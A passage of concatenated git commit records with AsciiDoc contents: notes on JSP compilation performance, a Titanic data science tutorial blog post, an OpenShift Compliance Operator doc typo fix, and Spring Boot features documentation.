If a jsp contains 5 errors, we must run 5 times the plugin to discover all.\nSo if a big project contains multiples errors, we must run may times the plugin and so many times the full compilation of all jsp.\n\n== First fix : performance\n\nIn order to compile a big project faster, I propose different things\n\n=== Give all jsp to Jasper JSPC\n\nIn version 1.1.0 of the plugin, it takes all of the jsp and call execute JSPC for each of them.\nThis is the code : \n\n[source,java]\n====\nfor (String fileName : jspFiles) {\n\tjspc.setJspFiles(fileName);\n\tgetLog().info(\"Compiling \" + fileName);\n\tjspc.execute();\n}\n\n====\n\nMaybe it's an optimization with Tomcat 6.X, but I think with Tomcat 8.X it's slower than giving all JSP directly to JSPC.execute();\nSee pull request TODO to fix this.\n\n=== Execute compilation in parallel\n\nTo compile faster we need to compile in parallel.\nIndeed when we launch JavaMissionControl for example, we see the CPU is 20%-30% usage when compiling.\nTo increase CPU usage, we need to execute jspc in different thread.\nSee pull request TODO to add this feature.\n\n=== Benchmark\n\nI made a little benchmark with two projects : one with 400 jsp and one with 3000 jsp.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"3915cae0eab2cd818649d5c53c4038f7ce9d0e53","subject":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","message":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Titanic: Learning Data Science with RStudio\n:hp-alt-title: Predict Survival Propensity of Titanic Passengers\n:hp-tags: Blog, Open_Source, Machine_Learning, Analytics, Data_Science\n\nSo we are aspiring data scientists and want to dip our toes into link:http:\/\/rmarkdown.rstudio.com\/[RStudio]. How do we get started? We dive into the waters of the link:https:\/\/www.kaggle.com\/c\/titanic[Kaggle Titanic \"Competition\"], of course!\n\nOur objective: \n\n* learn how to think about the competition from a data science perspective\n* get somewhat comfortable with RStudio\n* predict whether or not a passenger would survive the sinking of the link:https:\/\/en.wikipedia.org\/wiki\/RMS_Titanic[RMS Titanic]\n* enter a Kaggle submission file for evaluation\n* profit!\n\n== Kaggle Basics\n\nKaggle is a community of data scientists and a platform for facilitating data science journeys. One way to participate is by entering data science competitions. Similar to other competitions, Kaggle provides two Titanic datasets containing passenger attributes:\n\n* a _training set_, complete with the outcome (target) variable for training our predictive model(s)\n* a _test set_, for predicting the unknown outcome variable based on the passenger attributes provided in both datasets.\n\nAfter training and validating our predictive model(s), we can then enter the submission file to Kaggle for evaluation. 
As we iterate, we can submit more files and assess our progress on the leaderboard. Subtle model improvements can lead to significant leaps on the leaderboard.\n\n\/\/[icon=\"\/images\/note.png\"]\n[NOTE]\n.*Data Science Perspective*\n=====================================\nWe need to use the provided attributes (variables) to train a predictive model, and how does that work? Some variables are correlated with each other. When those variables vary, the correlated variables will also vary to some degree. We need to:\n\n- maximize the number of explanatory variables: those that are correlated with the outcome variable, and \n- minimize the correlation of explanatory variables to each other (link:https:\/\/en.wikipedia.org\/wiki\/Multicollinearity[multicollinearity]).\n\nIn other words, we need to find the fewest quantity of variables that can explain everything that is going on with the outcome that we want to predict.\n=====================================\n\n== Titanic History Lesson\n\nThe Titanic was a British passenger liner that sank after colliding with an iceberg in the Atlantic on its maiden voyage en route to New York City. It was the largest ship of its time with 10 decks, 8 of which were for passengers. \n\nThere were 2,224 passengers and crew aboard. Of the 1,317 passengers, there were: 324 in First Class (including some of the wealthiest people of the time), 284 in Second Class, and 709 in Third Class. Of these, 869 (66%) were male and 447 (34%) female. There were 107 children aboard, the largest number of which were in Third Class.\n\nThe ship had enough lifeboats for about 1,100 passengers, and more than 1,500 died. Due to the \"women and children first\" protocol, men were disproportionately left aboard. Also, not all lifeboats were completely filled during the evacuation. The 705 surviving passengers were rescued by the RMS Carpathia around 2 hours after the catastrophe.\n\n== Tutorial Approach\n\nWe'll approach this project in multiple parts. This is still a work in progress, but roughly speaking it should look like:\n\n. Part 1: Basic Setup\n. Part 2: Feature Engineering\n. Part 3: Prediction\n. Part 4: Conclusion\n\n[source, Rmd]\n.test.Rmd\n----\nsetwd(\"\/home\/rstudio\/code\")\n\ntrnFile = \"data\/pml-har-trn.csv\"\ntstFile = \"data\/pml-har-tst.csv\"\nif (!file.exists(trnFile)) {\n trnfileUrl <- \"https:\/\/d396qusza40orc.cloudfront.net\/predmachlearn\/pml-training.csv\"\n download.file(trnfileUrl, destfile = trnFile, method = \"curl\")\n}\nif (!file.exists(tstFile)) {\n tstfileUrl <- \"https:\/\/d396qusza40orc.cloudfront.net\/predmachlearn\/pml-testing.csv\"\n download.file(tstfileUrl, destfile = tstFile, method = \"curl\")\n}\n----\n\n\n","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Titanic: Learning Data Science with RStudio\n:hp-alt-title: Predict Survival Propensity of Titanic Passengers\n:hp-tags: Blog, Open_Source, Machine_Learning, Analytics, Data_Science\n\nSo we are aspiring data scientists and want to dip our toes into link:http:\/\/rmarkdown.rstudio.com\/[RStudio]. How do we get started? 
We dive into the into the waters of the link:https:\/\/www.kaggle.com\/c\/titanic[Kaggle Titanic \"Competition\"], of course!\n\nOur objective: \n\n* learn how to think about the competition from a data science perspective\n* get somewhat comfortable with RStudio\n* predict whether or not a passenger would survive the sinking of the link:https:\/\/en.wikipedia.org\/wiki\/RMS_Titanic[RMS Titanic]\n* enter a Kaggle submission file for evaluation\n* profit!\n\n== Kaggle Basics\n\nKaggle is a community of data scientists and a platform for facilitating data science journeys. One way to participate, is by entering data science competitions. Similar to other competitions, Kaggle provides two Titanic datasets containing passenger attributes:\n\n* a _training set_, complete with the outcome (target) variable for training our predictive model(s)\n* a _test set_, for predicting the unknown outcome variable based on the passenger attributes provided in both datasets.\n\nAfter training and validating our predictive model(s), we can then enter the submission file to Kaggle for evaluation. As we iterate, we can submit more files and assess our progress on the leaderboard. Subtle model improvements can lead to significant leaps on the leaderboard.\n\n\/\/[icon=\"\/images\/note.png\"]\n[NOTE]\n.*Data Science Perspective*\n=====================================\nWe need to use the provided attributes (variables) to train a predictive model, and how does that work? Some variables are correlated with each other. When those variables vary, the correlated variables will also vary to some degree. We need to:\n\n- maximize the number of explanatory variables: those that are correlated with the outcome variable, and \n- minimize the correlation of explanatory variables to each other (link:https:\/\/en.wikipedia.org\/wiki\/Multicollinearity[multicollinearity]).\n\nIn other words, we need to find the fewest quantity of variables that can explain everything that is going on with the outcome that we want to predict.\n=====================================\n\n== Titanic History Lesson\n\nThe Titanic was a British passenger liner that sank after colliding with an iceberg in the Atlantic on its maiden voyage en route to New York City. It was the largest ship of its time with 10 decks, 8 of which were for passengers. \n\nThere were 2,224 passengers and crew aboard. Of the 1,317 passengers, there were: 324 in First Class (including some of the wealthiest people of the time), 284 in Second Class, and 709 in Third Class. Of these, 869 (66%) were male and 447 (34%) female. There were 107 children aboard, the largest number of which were in Third Class.\n\nThe ship had enough lifeboats for about 1,100 passengers, and more than 1,500 died. Due to the \"women and children first\" protocol, men were disproportionately left aboard. Also, not all lifeboats were completely filled during the evacuation. The 705 surviving passengers were rescued by the RMS Carpathia around 2 hours after the catastrophe.\n\n== Tutorial Approach\n\nWe'll approach this project in multiple parts. This is still a work in progress, but roughly speaking it should look like:\n\n. Part 1: Basic Setup\n. Part 2: Feature Engineering\n. Part 3: Prediction\n. 
Part 4: Conclusion\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"1e37733198343874e1f060509fa320f2753fab98","subject":"Bug BZ1906842 Corrected typo in Compliance Operator Manage Doc","message":"Bug BZ1906842 Corrected typo in Compliance Operator Manage Doc\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"security\/compliance_operator\/compliance-operator-manage.adoc","new_file":"security\/compliance_operator\/compliance-operator-manage.adoc","new_contents":"[id=\"compliance-operator-understanding\"]\n= Managing the Compliance Operator\ninclude::modules\/common-attributes.adoc[]\n:context: managing-compliance\n\ntoc::[]\n\nThis section describes the lifecycle of security content, including how to use an updated version of compliance content and how to create a custom `ProfileBundle` object.\n\ninclude::modules\/compliance-update.adoc[leveloffset=+1]\n\ninclude::modules\/compliance-imagestreams.adoc[leveloffset=+1]\n\ninclude::modules\/compliance-profilebundle.adoc[leveloffset=+1]\n","old_contents":"[id=\"compliance-operator-understanding\"]\n= Managinging the Compliance Operator\ninclude::modules\/common-attributes.adoc[]\n:context: managing-compliance\n\ntoc::[]\n\nThis section describes the lifecycle of security content, including how to use an updated version of compliance content and how to create a custom `ProfileBundle` object.\n\ninclude::modules\/compliance-update.adoc[leveloffset=+1]\n\ninclude::modules\/compliance-imagestreams.adoc[leveloffset=+1]\n\ninclude::modules\/compliance-profilebundle.adoc[leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab7bec11603f6178f2b10135def22bea74e8cb39","subject":"Update clarify of bean conditions","message":"Update clarify of bean conditions\n\nSee 
gh-4104\n","repos":"olivergierke\/spring-boot,michael-simons\/spring-boot,javyzheng\/spring-boot,srikalyan\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,bclozel\/spring-boot,javyzheng\/spring-boot,ptahchiev\/spring-boot,rweisleder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mbogoevici\/spring-boot,kdvolder\/spring-boot,neo4j-contrib\/spring-boot,mdeinum\/spring-boot,bbrouwer\/spring-boot,RichardCSantana\/spring-boot,kdvolder\/spring-boot,ameraljovic\/spring-boot,drumonii\/spring-boot,vakninr\/spring-boot,joansmith\/spring-boot,mbogoevici\/spring-boot,ameraljovic\/spring-boot,pvorb\/spring-boot,nebhale\/spring-boot,xiaoleiPENG\/my-project,xiaoleiPENG\/my-project,zhanhb\/spring-boot,NetoDevel\/spring-boot,bjornlindstrom\/spring-boot,i007422\/jenkins2-course-spring-boot,dreis2211\/spring-boot,herau\/spring-boot,jmnarloch\/spring-boot,hello2009chen\/spring-boot,mdeinum\/spring-boot,deki\/spring-boot,Buzzardo\/spring-boot,javyzheng\/spring-boot,SaravananParthasarathy\/SPSDemo,mbogoevici\/spring-boot,bjornlindstrom\/spring-boot,deki\/spring-boot,ptahchiev\/spring-boot,qerub\/spring-boot,jmnarloch\/spring-boot,bijukunjummen\/spring-boot,tsachev\/spring-boot,ollie314\/spring-boot,shakuzen\/spring-boot,jvz\/spring-boot,ptahchiev\/spring-boot,spring-projects\/spring-boot,ameraljovic\/spring-boot,philwebb\/spring-boot-concourse,lenicliu\/spring-boot,minmay\/spring-boot,izeye\/spring-boot,yangdd1205\/spring-boot,hello2009chen\/spring-boot,royclarkson\/spring-boot,ihoneymon\/spring-boot,NetoDevel\/spring-boot,mdeinum\/spring-boot,bijukunjummen\/spring-boot,shangyi0102\/spring-boot,yangdd1205\/spring-boot,i007422\/jenkins2-course-spring-boot,chrylis\/spring-boot,philwebb\/spring-boot,akmaharshi\/jenkins,hello2009chen\/spring-boot,afroje-reshma\/spring-boot-sample,thomasdarimont\/spring-boot,philwebb\/spring-boot,herau\/spring-boot,ptahchiev\/spring-boot,jbovet\/spring-boot,scottfrederick\/spring-boot,ihoneymon\/spring-boot,neo4j-contrib\/spring-boot,olivergierke\/spring-boot,sbcoba\/spring-boot,kdvolder\/spring-boot,minmay\/spring-boot,felipeg48\/spring-boot,lburgazzoli\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,isopov\/spring-boot,SaravananParthasarathy\/SPSDemo,tsachev\/spring-boot,dfa1\/spring-boot,herau\/spring-boot,olivergierke\/spring-boot,Nowheresly\/spring-boot,royclarkson\/spring-boot,felipeg48\/spring-boot,linead\/spring-boot,sebastiankirsch\/spring-boot,xiaoleiPENG\/my-project,wilkinsona\/spring-boot,dreis2211\/spring-boot,kamilszymanski\/spring-boot,hqrt\/jenkins2-course-spring-boot,mbenson\/spring-boot,brettwooldridge\/spring-boot,spring-projects\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,bclozel\/spring-boot,qerub\/spring-boot,bijukunjummen\/spring-boot,joansmith\/spring-boot,shangyi0102\/spring-boot,dfa1\/spring-boot,spring-projects\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,joshthornhill\/spring-boot,RichardCSantana\/spring-boot,zhangshuangquan\/spring-root,mosoft521\/spring-boot,thomasdarimont\/spring-boot,htynkn\/spring-boot,neo4j-contrib\/spring-boot,ihoneymon\/spring-boot,felipeg48\/spring-boot,donhuvy\/spring-boot,philwebb\/spring-boot-concourse,ilayaperumalg\/spring-boot,afroje-reshma\/spring-boot-sample,RichardCSantana\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,donhuvy\/spring-boot,htynkn\/spring-boot,zhangshuangquan\/spring-root,sbuettner\/spring-boot,lenicliu\/spring-boot,philwebb\/spring-boot-
concourse,lenicliu\/spring-boot,minmay\/spring-boot,jvz\/spring-boot,ilayaperumalg\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,hello2009chen\/spring-boot,neo4j-contrib\/spring-boot,felipeg48\/spring-boot,sbuettner\/spring-boot,mosoft521\/spring-boot,royclarkson\/spring-boot,afroje-reshma\/spring-boot-sample,chrylis\/spring-boot,jbovet\/spring-boot,Buzzardo\/spring-boot,izeye\/spring-boot,shakuzen\/spring-boot,SaravananParthasarathy\/SPSDemo,jxblum\/spring-boot,mbogoevici\/spring-boot,royclarkson\/spring-boot,izeye\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,sebastiankirsch\/spring-boot,habuma\/spring-boot,candrews\/spring-boot,kamilszymanski\/spring-boot,spring-projects\/spring-boot,zhanhb\/spring-boot,DeezCashews\/spring-boot,jxblum\/spring-boot,philwebb\/spring-boot-concourse,neo4j-contrib\/spring-boot,philwebb\/spring-boot,DeezCashews\/spring-boot,NetoDevel\/spring-boot,i007422\/jenkins2-course-spring-boot,drumonii\/spring-boot,shakuzen\/spring-boot,cleverjava\/jenkins2-course-spring-boot,joansmith\/spring-boot,jbovet\/spring-boot,lucassaldanha\/spring-boot,lucassaldanha\/spring-boot,zhangshuangquan\/spring-root,afroje-reshma\/spring-boot-sample,zhangshuangquan\/spring-root,habuma\/spring-boot,DeezCashews\/spring-boot,kdvolder\/spring-boot,jxblum\/spring-boot,mrumpf\/spring-boot,candrews\/spring-boot,tsachev\/spring-boot,jayarampradhan\/spring-boot,qerub\/spring-boot,tiarebalbi\/spring-boot,drumonii\/spring-boot,michael-simons\/spring-boot,thomasdarimont\/spring-boot,javyzheng\/spring-boot,srikalyan\/spring-boot,aahlenst\/spring-boot,lucassaldanha\/spring-boot,hqrt\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,izeye\/spring-boot,rweisleder\/spring-boot,bijukunjummen\/spring-boot,yhj630520\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,rweisleder\/spring-boot,lburgazzoli\/spring-boot,habuma\/spring-boot,donhuvy\/spring-boot,rweisleder\/spring-boot,qerub\/spring-boot,royclarkson\/spring-boot,Nowheresly\/spring-boot,tsachev\/spring-boot,vakninr\/spring-boot,vpavic\/spring-boot,vpavic\/spring-boot,brettwooldridge\/spring-boot,yhj630520\/spring-boot,NetoDevel\/spring-boot,brettwooldridge\/spring-boot,Buzzardo\/spring-boot,linead\/spring-boot,scottfrederick\/spring-boot,joshiste\/spring-boot,shakuzen\/spring-boot,joshiste\/spring-boot,scottfrederick\/spring-boot,sbuettner\/spring-boot,joshthornhill\/spring-boot,candrews\/spring-boot,ameraljovic\/spring-boot,mrumpf\/spring-boot,bclozel\/spring-boot,chrylis\/spring-boot,wilkinsona\/spring-boot,jmnarloch\/spring-boot,akmaharshi\/jenkins,ptahchiev\/spring-boot,nebhale\/spring-boot,sbuettner\/spring-boot,ilayaperumalg\/spring-boot,zhanhb\/spring-boot,mbenson\/spring-boot,jmnarloch\/spring-boot,tiarebalbi\/spring-boot,joshiste\/spring-boot,lburgazzoli\/spring-boot,dreis2211\/spring-boot,akmaharshi\/jenkins,mbogoevici\/spring-boot,ilayaperumalg\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,aahlenst\/spring-boot,akmaharshi\/jenkins,aahlenst\/spring-boot,ihoneymon\/spring-boot,jvz\/spring-boot,sbcoba\/spring-boot,mbenson\/spring-boot,Nowheresly\/spring-boot,vpavic\/spring-boot,drumonii\/spring-boot,bbrouwer\/spring-boot,RichardCSantana\/spring-boot,eddumelendez\/spring-boot,dreis2211\/spring-boot,lenicliu\/spring-boot,spring-projects\/spring-boot,vakninr\/spring-boot,ihoneymon\/spring-boot,shangyi0102\/spring-boot,tiarebalbi\/spring-boot,bijukunjummen\/spring-boot,mbenson\/spring-boot,yhj630520\/spring-boot,jxblum\/spring-boot,bclozel
\/spring-boot,izeye\/spring-boot,RichardCSantana\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,sbcoba\/spring-boot,linead\/spring-boot,lexandro\/spring-boot,pvorb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,donhuvy\/spring-boot,lburgazzoli\/spring-boot,jayarampradhan\/spring-boot,mrumpf\/spring-boot,ollie314\/spring-boot,isopov\/spring-boot,joshiste\/spring-boot,olivergierke\/spring-boot,jvz\/spring-boot,zhanhb\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mrumpf\/spring-boot,yhj630520\/spring-boot,joshiste\/spring-boot,scottfrederick\/spring-boot,bbrouwer\/spring-boot,philwebb\/spring-boot,bclozel\/spring-boot,candrews\/spring-boot,Buzzardo\/spring-boot,mosoft521\/spring-boot,DeezCashews\/spring-boot,wilkinsona\/spring-boot,isopov\/spring-boot,dfa1\/spring-boot,bjornlindstrom\/spring-boot,dfa1\/spring-boot,sbcoba\/spring-boot,xiaoleiPENG\/my-project,hqrt\/jenkins2-course-spring-boot,sbcoba\/spring-boot,habuma\/spring-boot,shakuzen\/spring-boot,thomasdarimont\/spring-boot,zhanhb\/spring-boot,pvorb\/spring-boot,scottfrederick\/spring-boot,felipeg48\/spring-boot,jbovet\/spring-boot,NetoDevel\/spring-boot,javyzheng\/spring-boot,nebhale\/spring-boot,afroje-reshma\/spring-boot-sample,mdeinum\/spring-boot,ollie314\/spring-boot,chrylis\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,htynkn\/spring-boot,tsachev\/spring-boot,herau\/spring-boot,joshthornhill\/spring-boot,zhanhb\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,lexandro\/spring-boot,jbovet\/spring-boot,michael-simons\/spring-boot,pvorb\/spring-boot,tsachev\/spring-boot,joshthornhill\/spring-boot,herau\/spring-boot,minmay\/spring-boot,yangdd1205\/spring-boot,candrews\/spring-boot,felipeg48\/spring-boot,nebhale\/spring-boot,sbuettner\/spring-boot,philwebb\/spring-boot-concourse,kamilszymanski\/spring-boot,lexandro\/spring-boot,michael-simons\/spring-boot,jvz\/spring-boot,kamilszymanski\/spring-boot,mbenson\/spring-boot,cleverjava\/jenkins2-course-spring-boot,mdeinum\/spring-boot,donhuvy\/spring-boot,SaravananParthasarathy\/SPSDemo,cleverjava\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,shakuzen\/spring-boot,hello2009chen\/spring-boot,dreis2211\/spring-boot,i007422\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,bclozel\/spring-boot,eddumelendez\/spring-boot,vpavic\/spring-boot,ollie314\/spring-boot,yhj630520\/spring-boot,Buzzardo\/spring-boot,isopov\/spring-boot,htynkn\/spring-boot,brettwooldridge\/spring-boot,donhuvy\/spring-boot,zhangshuangquan\/spring-root,sebastiankirsch\/spring-boot,michael-simons\/spring-boot,bjornlindstrom\/spring-boot,brettwooldridge\/spring-boot,minmay\/spring-boot,ameraljovic\/spring-boot,aahlenst\/spring-boot,spring-projects\/spring-boot,kamilszymanski\/spring-boot,DeezCashews\/spring-boot,Nowheresly\/spring-boot,ihoneymon\/spring-boot,scottfrederick\/spring-boot,cleverjava\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,lucassaldanha\/spring-boot,philwebb\/spring-boot,olivergierke\/spring-boot,deki\/spring-boot,aahlenst\/spring-boot,srikalyan\/spring-boot,i007422\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,dfa1\/spring-boot,jayarampradhan\/spring-boot,isopov\/spring-boot,drumonii\/spring-boot,tiarebalbi\/spring-boot,tiarebalbi\/spring-boot,rweisleder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mosoft521\/spring-boot,sebastiankirsch\/spring-boot,hqrt\/jenkins2-course-spring-boot,nebhale\/spring-boot,bbrouwer\/spring-boot,jxblum\/spring-boot,pvorb\/spring-boot,kdv
older\/spring-boot,shangyi0102\/spring-boot,linead\/spring-boot,xiaoleiPENG\/my-project,bjornlindstrom\/spring-boot,srikalyan\/spring-boot,ollie314\/spring-boot,deki\/spring-boot,mosoft521\/spring-boot,isopov\/spring-boot,lexandro\/spring-boot,htynkn\/spring-boot,chrylis\/spring-boot,joansmith\/spring-boot,akmaharshi\/jenkins,qerub\/spring-boot,jmnarloch\/spring-boot,lenicliu\/spring-boot,linead\/spring-boot,jayarampradhan\/spring-boot,sebastiankirsch\/spring-boot,joansmith\/spring-boot,joshiste\/spring-boot,joshthornhill\/spring-boot,thomasdarimont\/spring-boot,lexandro\/spring-boot,lucassaldanha\/spring-boot,Nowheresly\/spring-boot,eddumelendez\/spring-boot,wilkinsona\/spring-boot,shangyi0102\/spring-boot,habuma\/spring-boot,habuma\/spring-boot,mdeinum\/spring-boot,vakninr\/spring-boot,eddumelendez\/spring-boot,srikalyan\/spring-boot,mrumpf\/spring-boot,vakninr\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,deki\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"[[boot-features]]\n= Spring Boot features\n\n[partintro]\n--\nThis section dives into the details of Spring Boot. Here you can learn about the key\nfeatures that you will want to use and customize. If you haven't already, you might want\nto read the _<<getting-started.adoc#getting-started>>_ and\n_<<using-spring-boot.adoc#using-boot>>_ sections so that you have a good grounding\nof the basics.\n--\n\n\n\n[[boot-features-spring-application]]\n== SpringApplication\nThe `SpringApplication` class provides a convenient way to bootstrap a Spring application\nthat will be started from a `main()` method. In many situations you can just delegate to\nthe static `SpringApplication.run` method:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MySpringConfiguration.class, args);\n\t}\n----\n\nWhen your application starts you should see something similar to the following:\n\n[indent=0,subs=\"attributes\"]\n----\n . 
____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: v{spring-boot-version}\n\n2013-07-31 00:08:16.117 INFO 56603 --- [ main] o.s.b.s.app.SampleApplication : Starting SampleApplication v0.1.0 on mycomputer with PID 56603 (\/apps\/myapp.jar started by pwebb)\n2013-07-31 00:08:16.166 INFO 56603 --- [ main] ationConfigEmbeddedWebApplicationContext : Refreshing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@6e5a8246: startup date [Wed Jul 31 00:08:16 PDT 2013]; root of context hierarchy\n2014-03-04 13:09:54.912 INFO 41370 --- [ main] .t.TomcatEmbeddedServletContainerFactory : Server initialized with port: 8080\n2014-03-04 13:09:56.501 INFO 41370 --- [ main] o.s.b.s.app.SampleApplication : Started SampleApplication in 2.992 seconds (JVM running for 3.658)\n----\n\nBy default `INFO` logging messages will be shown, including some relevant startup details\nsuch as the user that launched the application.\n\n\n[[boot-features-banner]]\n=== Customizing the Banner\nThe banner that is printed on start up can be changed by adding a `banner.txt` file\nto your classpath, or by setting `banner.location` to the location of such a file.\nIf the file has an unusual encoding you can set `banner.charset` (default is `UTF-8`).\n\nYou can use the following variables inside your `banner.txt` file:\n\n.Banner variables\n|===\n| Variable | Description\n\n|`${application.version}`\n|The version number of your application as declared in `MANIFEST.MF`. For example `Implementation-Version: 1.0` is printed as `1.0`.\n\n|`${application.formatted-version}`\n|The version number of your application as declared in `MANIFEST.MF` formatted for\ndisplay (surrounded with brackets and prefixed with `v`). For example `(v1.0)`.\n\n|`${spring-boot.version}`\n|The Spring Boot version that you are using. For example `{spring-boot-version}`.\n\n|`${spring-boot.formatted-version}`\n|The Spring Boot version that you are using formatted for display (surrounded with\nbrackets and prefixed with `v`). For example `(v{spring-boot-version})`.\n\n|`${Ansi.NAME}` (or `${AnsiColor.NAME}`, `${AnsiBackground.NAME}`, `${AnsiStyle.NAME}`)\n|Where `NAME` is the name of an ANSI escape code. See\n{sc-spring-boot}\/ansi\/AnsiPropertySource.{sc-ext}[`AnsiPropertySource`] for details.\n|===\n\nTIP: The `SpringApplication.setBanner(...)` method can be used if you want to generate\na banner programmatically. Use the `org.springframework.boot.Banner` interface and\nimplement your own `printBanner()` method.\n\n\n\n[[boot-features-customizing-spring-application]]\n=== Customizing SpringApplication\nIf the `SpringApplication` defaults aren't to your taste you can instead create a local\ninstance and customize it. For example, to turn off the banner you would write:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication app = new SpringApplication(MySpringConfiguration.class);\n\t\tapp.setBannerMode(Banner.Mode.OFF);\n\t\tapp.run(args);\n\t}\n----\n\nNOTE: The constructor arguments passed to `SpringApplication` are configuration sources\nfor Spring beans. 
In most cases these will be references to `@Configuration` classes, but\nthey could also be references to XML configuration or to packages that should be scanned.\n\nIt is also possible to configure the `SpringApplication` using an `application.properties`\nfile. See _<<boot-features-external-config>>_ for details.\n\nFor a complete list of the configuration options, see the\n{dc-spring-boot}\/SpringApplication.{dc-ext}[`SpringApplication` Javadoc].\n\n\n\n[[boot-features-fluent-builder-api]]\n=== Fluent builder API\nIf you need to build an `ApplicationContext` hierarchy (multiple contexts with a\nparent\/child relationship), or if you just prefer using a '`fluent`' builder API, you\ncan use the `SpringApplicationBuilder`.\n\nThe `SpringApplicationBuilder` allows you to chain together multiple method calls, and\nincludes `parent` and `child` methods that allow you to create a hierarchy.\n\nFor example:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(Parent.class)\n\t\t.child(Application.class)\n\t\t.run(args);\n----\n\nNOTE: There are some restrictions when creating an `ApplicationContext` hierarchy, e.g.\nWeb components *must* be contained within the child context, and the same `Environment`\nwill be used for both parent and child contexts. See the\n{dc-spring-boot}\/builder\/SpringApplicationBuilder.{dc-ext}[`SpringApplicationBuilder`\nJavadoc] for full details.\n\n\n\n[[boot-features-application-events-and-listeners]]\n=== Application events and listeners\nIn addition to the usual Spring Framework events, such as\n{spring-javadoc}\/context\/event\/ContextRefreshedEvent.{dc-ext}[`ContextRefreshedEvent`],\na `SpringApplication` sends some additional application events. Some events are actually\ntriggered before the `ApplicationContext` is created.\n\nYou can register event listeners in a number of ways, the most common being the\n`SpringApplication.addListeners(...)` method.\n\nApplication events are sent in the following order, as your application runs:\n\n. An `ApplicationStartedEvent` is sent at the start of a run, but before any\n processing except the registration of listeners and initializers.\n. An `ApplicationEnvironmentPreparedEvent` is sent when the `Environment` to be used in\n the context is known, but before the context is created.\n. An `ApplicationPreparedEvent` is sent just before the refresh is started, but after bean\n definitions have been loaded.\n. An `ApplicationReadyEvent` is sent after the refresh and any related callbacks have\n been processed to indicate the application is ready to service requests.\n. An `ApplicationFailedEvent` is sent if there is an exception on startup.\n\nTIP: You often won't need to use application events, but it can be handy to know that they\nexist. Internally, Spring Boot uses events to handle a variety of tasks.\n\n\n\n[[boot-features-web-environment]]\n=== Web environment\nA `SpringApplication` will attempt to create the right type of `ApplicationContext` on\nyour behalf. By default, an `AnnotationConfigApplicationContext` or\n`AnnotationConfigEmbeddedWebApplicationContext` will be used, depending on whether you\nare developing a web application or not.\n\nThe algorithm used to determine a '`web environment`' is fairly simplistic (based on the\npresence of a few classes). You can use `setWebEnvironment(boolean webEnvironment)` if\nyou need to override the default.
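\n\nFor example, a minimal sketch (assuming a plain `MyApplication` configuration class, which is not one of this document's other examples):\n\n[source,java,indent=0]\n----\n\tSpringApplication app = new SpringApplication(MyApplication.class);\n\t\/\/ create a plain (non-web) ApplicationContext, with no embedded servlet container\n\tapp.setWebEnvironment(false);\n\tapp.run(args);\n----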
